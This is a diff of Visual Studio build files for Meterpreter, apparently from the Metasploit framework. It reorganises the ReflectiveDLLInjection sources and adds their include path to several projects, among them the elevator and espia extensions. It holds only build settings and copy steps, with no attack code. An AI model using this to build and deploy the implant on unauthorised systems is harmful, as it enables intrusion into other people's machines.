<IntrinsicFunctions>true</IntrinsicFunctions>
<WholeProgramOptimization>false</WholeProgramOptimization>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\ReflectiveDLLInjection\inject\src;..\..\source\ReflectiveDLLInjection\dll\src;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN64;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
@ -351,17 +319,17 @@
</Lib>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\source\ReflectiveDLLInjection\DelayLoadMetSrv.c" />
<ClCompile Include="..\..\source\ReflectiveDLLInjection\GetProcAddressR.c" />
<ClCompile Include="..\..\source\ReflectiveDLLInjection\LoadLibraryR.c" />
<ClCompile Include="..\..\source\ReflectiveDLLInjection\ReflectiveLoader.c" />
<ClCompile Include="..\..\source\DelayLoadMetSrv\DelayLoadMetSrv.c" />
<ClCompile Include="..\..\source\ReflectiveDLLInjection\inject\src\GetProcAddressR.c" />
<ClCompile Include="..\..\source\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
<ClCompile Include="..\..\source\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\source\ReflectiveDLLInjection\DelayLoadMetSrv.h" />
<ClInclude Include="..\..\source\ReflectiveDLLInjection\GetProcAddressR.h" />
<ClInclude Include="..\..\source\ReflectiveDLLInjection\LoadLibraryR.h" />
<ClInclude Include="..\..\source\ReflectiveDLLInjection\ReflectiveDLLInjection.h" />
<ClInclude Include="..\..\source\ReflectiveDLLInjection\ReflectiveLoader.h" />
<ClInclude Include="..\..\source\DelayLoadMetSrv\DelayLoadMetSrv.h" />
<ClInclude Include="..\..\source\ReflectiveDLLInjection\inject\src\GetProcAddressR.h" />
<ClInclude Include="..\..\source\ReflectiveDLLInjection\inject\src\LoadLibraryR.h" />
<ClInclude Include="..\..\source\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
<ClInclude Include="..\..\source\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\backcompat\backcompat.vcxproj">
@ -373,4 +341,4 @@
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

16
c/meterpreter/workspace/common/common.vcxproj
View File

@ -139,7 +139,7 @@
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<FunctionLevelLinking>false</FunctionLevelLinking>
@ -177,7 +177,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<FunctionLevelLinking>false</FunctionLevelLinking>
@ -218,7 +218,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<FunctionLevelLinking>false</FunctionLevelLinking>
@ -257,7 +257,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<FunctionLevelLinking>false</FunctionLevelLinking>
@ -293,7 +293,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<FunctionLevelLinking>false</FunctionLevelLinking>
@ -331,7 +331,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<FunctionLevelLinking>false</FunctionLevelLinking>
@ -372,7 +372,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<FunctionLevelLinking>false</FunctionLevelLinking>
@ -411,7 +411,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<FunctionLevelLinking>false</FunctionLevelLinking>

10
c/meterpreter/workspace/elevator/elevator.vcxproj
View File

@ -143,6 +143,7 @@
<CompileAs>CompileAsC</CompileAs>
<ShowIncludes>false</ShowIncludes>
<TreatWarningAsError>true</TreatWarningAsError>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
@ -181,6 +182,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<CompileAs>CompileAsC</CompileAs>
<ShowIncludes>false</ShowIncludes>
<TreatWarningAsError>true</TreatWarningAsError>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
@ -218,6 +220,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<TreatWarningAsError>true</TreatWarningAsError>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
@ -248,6 +251,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<TreatWarningAsError>true</TreatWarningAsError>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
@ -279,6 +283,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<CompileAs>CompileAsC</CompileAs>
<ShowIncludes>false</ShowIncludes>
<TreatWarningAsError>true</TreatWarningAsError>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<GenerateDebugInformation>false</GenerateDebugInformation>
@ -317,6 +322,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<CompileAs>CompileAsC</CompileAs>
<ShowIncludes>false</ShowIncludes>
<TreatWarningAsError>true</TreatWarningAsError>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<GenerateDebugInformation>false</GenerateDebugInformation>
@ -357,6 +363,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<CallingConvention>StdCall</CallingConvention>
<CompileAs>CompileAsC</CompileAs>
<TreatWarningAsError>true</TreatWarningAsError>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<GenerateDebugInformation>false</GenerateDebugInformation>
@ -394,6 +401,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<CallingConvention>StdCall</CallingConvention>
<CompileAs>CompileAsC</CompileAs>
<TreatWarningAsError>true</TreatWarningAsError>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<GenerateDebugInformation>false</GenerateDebugInformation>
@ -437,4 +445,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>

16
c/meterpreter/workspace/ext_server_bare/ext_server_bare.vcxproj
View File

@ -106,7 +106,7 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BARE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -136,7 +136,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BARE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -177,7 +177,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
@ -211,7 +211,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
@ -237,7 +237,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BARE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -287,7 +287,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BARE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -340,7 +340,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BARE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -390,7 +390,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\bare;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_BARE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>

34
c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj
View File

@ -130,7 +130,7 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -152,7 +152,7 @@
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -162,7 +162,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -184,7 +184,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -197,7 +197,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -218,7 +218,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -231,7 +231,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -252,7 +252,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<MinimumRequiredVersion />
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
@ -264,7 +264,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -304,7 +304,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -316,7 +316,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -356,7 +356,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -371,7 +371,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -408,7 +408,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</MinimumRequiredVersion>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
@ -423,7 +423,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\espia;..\..\source\openssl\include;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
